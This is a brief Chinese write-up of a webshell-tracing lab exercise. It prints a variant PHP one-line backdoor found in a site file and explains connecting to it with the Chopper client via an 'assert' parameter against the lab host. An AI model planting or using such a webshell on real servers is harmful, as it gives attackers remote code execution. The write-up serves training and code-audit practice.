WebShell代码分析溯源(第1题)-墨者学院

打开之后发现是一般性的常见网站挂黑页,先下载网站源码然后进行分析,有能力的可以阅读PHP源码的进行分析

如果对PHP代码不是很熟悉可以使用专业的代码审计工具seay进行扫描。
扫描之后发现cn-right.php文件中存在一句话木马。

<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>

 

这是典型的变种一句话木马,菜刀连接的时候需要在url后面加上?POST=assert
构造语句:http://219.153.49.228:44549/www/cn-right.php?POST=assert
密码:GET进行连接

工具:Seay源代码审计系统
下载:
百度云盘:https://pan.baidu.com/s/1bqxNLzp 密码:ptbs
蓝奏云盘:https://www.lanzous.com/i1rab4d

发表评论

电子邮件地址不会被公开。必填项已用 * 标注